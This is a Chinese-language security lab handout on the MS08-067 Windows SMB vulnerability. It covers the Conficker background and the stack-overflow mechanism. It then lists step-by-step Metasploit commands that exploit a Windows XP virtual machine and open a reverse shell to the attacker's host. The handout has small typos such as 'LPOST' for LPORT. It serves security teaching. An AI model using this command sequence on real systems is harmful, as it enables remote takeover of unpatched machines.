软件漏洞利用及发现实验

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

软件漏洞利用及发现

1.1超级漏洞MS08-067简介

MS08-067 漏洞是2008 年年底爆出的一个特大漏洞,存在于当时的所有微软系统,杀伤力超强。其原理是攻击者利用受害主机默认开放的SMB 服务端口445 ,发送恶意资料到该端口,通过MSRPC 接口调用Server 服务的一个函数,并破坏程序的战缓冲区,获得远程代码执行(Remote Code Execution)权限,从而完全控制主机。由于MS08-067 漏洞的影响范围之大、危害之严重,微软公司也在计划外超常规地专门为这一漏洞发布紧急补丁,并建议客户立即修补漏洞。

主流安全厂商也都一致给予该漏洞两个重要评价标准,并将其归属于最高严重级别的漏洞。这两个标准是:

1)能远程主动发起针对主流桌面操作系统的默认开放端口的扫描,并对有漏洞主机直接获得系统权限;

2)漏洞可以被利用作为蠕虫的主动传播机制。

由于MS08-067 漏洞所在服务的普遍性,以及可以导致远程控制系统,所以该漏洞一经公布,便马上被应用于蠕虫传播。著名的Conficker (飞客)蠕虫便是其中传播范围最广、影响时间最长的一个案例,关于Conficker 蠕虫的爆发与应急响应有非常多的幕后故事,美国National Book Awards 终身成就奖获得者,著名畅销书作家Mark Bowden 出版的《蠕虫:第一次数字世界大战》(Worm: The Story of The First Digital World War)以纪实方式描写了Conficker 蠕虫事件的全过程。

中国是Conficker 蠕虫的最大受害国,在最初感染的全球150 万计算机中占到了40 万台。直到2011 年,根据CNCERT/CC 统计,中国感染Conficker 蠕虫的主机IP 月均仍超过400 万个。然而遗憾的是,书中描写调查组的应急响应过程时,最初毫无理由地怀疑中国政府是造成Conficker 蠕虫的幕后黑手,并以据调查中国拥有250 支“黑客团队”,以及一些毫无关联且很可能子虚乌有的人侵美国军方、NASA 事件作为支持依据。这种“中国黑客威胁论”论调体现了作者与一些国外信息安全人士先入为主、以偏概全的偏见,同时反映了政府部门一些不恰当做法与民间“黑客”的一些胡作非为酿成中美信息安全业界互不信任的局面。

1.2漏洞MS08-067基本原理

MS08-067 漏洞是通过MSRPC over SMB 通道调用Server 服务程序中的NetPathCanonicalize 函数时触发的,而NetPathCanonicalize 函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中发生了栈缓冲区内存错误,造成可被利用实施远程代码执行。

所谓的路径规范化,就是将路径字符串中的‘/’转换为‘\’同时去除相对路径“\ . \”和“\ . . \”。如下所示:

“ **\*\ . \** ” => “ **\*\ ** ”

“ **\*\ . .\** ” => “ **\** ”

在路径规范化的操作中,服务程序对路径字符串的地址空间检查存在逻辑漏洞。攻击者精心设计的输入路径,可以在函数去除“\ . . \”字符串时,把路径字符串中的内容复制到路径串之前的地址空间中(低地址),达到覆盖函数返回地址,执行任意代码的目的。

1.3ms08_067漏洞实例过程

攻击主机操作系统windows7 攻击软件metasploit4.1

实验环境VMware Workstation 10

目标主机操作系统Windows XP SP3 32位(已备好)将给定的虚拟机在VM中打开利用软件漏洞ms08_067漏洞

1.启动metasploit软件

启动速度比较慢,请耐心等待。

启动后的界面如下图。

2.使用帮助

输入“help”或者“?”获取帮助

在一条命令的后面加上“-h”获取后面应该跟随哪些参数。

3.渗透过程

1)在攻击主机中打开命令提示符cmd,查看攻击主机ip,ipconfig

192.168.100.115,如图4.7所示:

图4.7 查看攻击主机IP

2)打开虚拟机目标主机,查看主机ip,ipconfig 192.168.52.148,如图4.8所示:

图4.8 查看目标主机IP

3)在msf控制终端中搜索ms08_067漏洞,search ms08_067,如图4.9所示:

图4.9 搜索ms08_067 漏洞

4)使用攻击模块,use exploit/windows/smb/ms08_067_netapi,如图4.10所示:

图4.10 调用攻击模块

5)显示攻击载荷,show payloads,如图4.11所示:

图4.11 显示攻击载荷

6)设定攻击载荷,set payload generic/shell_reverse_tcp,如图4.12所示:

图4.12 设定攻击载荷

7)设定目标主机ip,set RHOST 192.168.52.148(根据查看的目标主机进行设定),

如图4.13所示:

图4.13 设定目标主机IP

8)设定攻击主机ip ,set LHOST 192.168.100.115(根据查看的攻击主机进行设

定),如图4.14所示:

图4.14 设定攻击主机IP

9)设定绑定端口,set LPOST 4679(随机设定),如图4.15所示:

图4.15 设定绑定端口

10)查看目标主机操作系统,show targets,如图4.16所示:

图4.16 查看目标主机操作系统

11)设定目标主机操作系统,set target 6(根据目标主机的操作系统选定参数),

如图4.17所示:

图4.17 设定目标主机操作系统

12)查看设定参数,show options,如图4.18所示:

图4.18 查看设定参数

13)实施攻击,exploit,如图4.19所示:

图4.19 实施攻击

相关文档
最新文档